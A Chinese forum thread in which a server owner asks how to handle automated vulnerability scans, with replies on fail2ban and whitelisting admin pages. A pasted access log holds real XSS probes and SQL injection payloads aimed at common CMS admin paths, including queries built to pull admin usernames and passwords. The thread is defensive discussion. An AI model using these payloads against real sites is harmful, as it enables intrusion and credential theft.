服务器被扫描，这种问题一般怎么解决，有什么工具

fail2ban?

同求

@austinchou0126 这个你敢在vps上用？这个对于有点流量的站一般级别日志输出就会瞬间99 CPU，过不了多久就abuse了

和楼主一样，感觉是脚本小子开了个工具，就开始扫描了，自动的，扫完没发现什么漏洞，估计它就离开了？

serverxxx.log:[W 140413 10:40:41 web:1728] 404 GET /include/dialog/select_soft.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E (123.125.160.215) 0.98ms
serverxxx.log:[W 140413 10:40:42 web:1728] 404 GET /include/dialog/select_images_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E (123.125.160.215) 0.55ms
serverxxx.log:[W 140413 10:40:43 web:1728] 404 GET /admin_aspcms/index.asp (123.125.160.215) 0.39ms
serverxxx.log:[W 140413 10:40:53 web:1728] 404 POST /admin.php (123.125.160.215) 1.30ms
serverxxx.log:[W 140413 10:40:55 web:1728] 404 POST /index.php?m=announcement&s=admin/notice (123.125.160.215) 0.62ms
serverxxx.log:[W 140413 10:41:08 web:1728] 404 POST /bocadmin/j/uploadify.php (123.125.160.215) 1.62ms
serverxxx.log:[W 140413 10:41:09 web:1728] 404 GET /jcms/setup/publishadmin.jsp (123.125.160.215) 0.44ms
serverxxx.log:[W 140413 10:41:13 web:1728] 404 GET /Aboutus.asp?Title=cfreer'%20and%201=2%20union%20select%2055221122%20from%20admin (123.125.160.215) 0.45ms
serverxxx.log:[W 140413 10:41:17 web:1728] 404 GET /index.php?m=news&s=admin/news&newsid=1%20and%20(SELECT%201%20from%20cfreer) (123.125.160.215) 0.43ms
serverxxx.log:[W 140413 10:41:26 web:1728] 404 GET /admin.php (123.125.160.215) 0.49ms
serverxxx.log:[W 140413 10:41:32 web:1728] 404 POST /index.php?m=company&s=admin/business_info_list (123.125.160.215) 1.40ms
serverxxx.log:[W 140413 10:41:39 web:1728] 404 GET /admin/admin/getpassword.php?action=next4&abt_type=2&password=123456&passwordsr=123456&array[0]=cfreer1122 (123.125.160.215) 0.47ms
serverxxx.log:[W 140413 10:41:50 web:1728] 404 GET /case/?settings[met_img]=met_admin_table%20where%201=1%20--%201 (123.125.160.215) 0.62ms
serverxxx.log:[W 140413 10:41:51 web:1728] 404 POST /index.php?m=payment&s=admin/pickupmod (123.125.160.215) 0.48ms
serverxxx.log:[W 140413 10:41:52 web:1728] 404 POST /mep-admin/DcServlet (123.125.160.215) 0.65ms
serverxxx.log:[W 140413 10:41:53 web:1728] 404 GET /microshop/index.php?act=api&op=get_personal_commend&data_count=1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,concat(0x7c,md5(1122),0x7c),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46%20from%20shopnc_admin (123.125.160.215) 0.47ms
serverxxx.log:[W 140413 10:42:05 web:1728] 404 GET /admin/payonline.php?act=login&table=information_schema.SCHEMATA%20where%201=(select%201%20from%20%20(select%20count(*),concat(version(),0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23 (123.125.160.215) 1.46ms
serverxxx.log:[W 140413 10:42:08 web:1728] 404 GET /index.php?m=Article&a=showByUname&uname=%2527or%25201%253D%2528select%25201%2520from%2520%2528select%2520count%2528%252a%2529%252Cconcat%2528floor%2528rand%25280%2529%252a2%2529%252C%2528select%2520md5%25281122%2529%2520from%2520fanwe_admin%2520limit%25200%252C1%2529%2529a%2520from%2520information_schema.tables%2520group%2520by%2520a%2529b%2529%2523 (123.125.160.215) 1.39ms
xxx_8002.log:[W 140413 10:26:35 web:1728] 404 GET /_vti_bin/_vti_adm/admin.dll (123.125.160.215) 0.42ms
xxx_8002.log:[W 140413 10:35:20 web:1728] 404 GET /News_search.asp?key=7%25'%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10%20from%20admin%20where%201%20or%20'%25'='&otype=title&Submit=%CB%D1%CB%F7 (123.125.160.215) 1.68ms
xxx_8002.log:[W 140413 10:39:23 web:1728] 404 GET /admin/index.asp (123.125.160.215) 0.35ms
xxx_8002.log:[W 140413 10:40:14 web:1728] 404 GET /admin/sysadmin_view.asp (123.125.160.215) 0.39ms

从这里看构造的url，倒是可以学习一点防攻击的经验，免得自己在这些地方露馅了。

@lightforce 有啥建议么

用 .htaccess 给网站管理员页面设置白名单。只有你自己的 IP 可以访问管理员页面，其他 IP 就 403 拒绝掉。